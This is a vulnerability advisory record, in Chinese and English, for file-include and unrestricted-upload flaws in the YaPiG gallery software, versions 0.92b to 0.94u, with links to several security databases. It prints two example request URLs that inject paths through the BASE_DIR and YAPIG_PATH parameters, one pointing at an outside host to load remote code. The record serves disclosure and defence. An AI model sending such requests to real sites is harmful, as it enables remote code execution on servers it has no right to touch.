https://www.exploit-db.com/exploits/25792
https://www.securityfocus.com/bid/89869
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200506-038

YaPiG0.92b，0.93u和0.94u版本中的upload.php脚本没有正确地对上传图像文件的扩展名加以限制，导致远程攻击者可以上传任意文件并执行任意PHP代码。

source: http://www.securityfocus.com/bid/13874/info

YaPiG is affected by remote and local file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.

This issue is reported to affect YaPiG versions 0.92b, 0.93u and 0.94u; earlier versions may also be affected. 

Version 0.92b: http://www.example.com/global.php?BASE_DIR=/local/path/to/global-gen.php
Version 0.93u/ 0.94u: http://www.example.com/last_gallery.php?YAPIG_PATH=http://www.example.com/

YaPiG YaPig 0.94U

YaPiG YaPig 0.93U

YaPiG YaPig 0.92B

来源:OSVDB
名称:17115
链接:http://www.osvdb.org/17115
来源:MISC
链接:http://secwatch.org/advisories/secwatch/20050530_yapig.txt
来源:SECTRACK
名称:1014103
链接:http://securitytracker.com/id?1014103
来源:SECUNIA
名称:15600
链接:http://secunia.com/advisories/15600/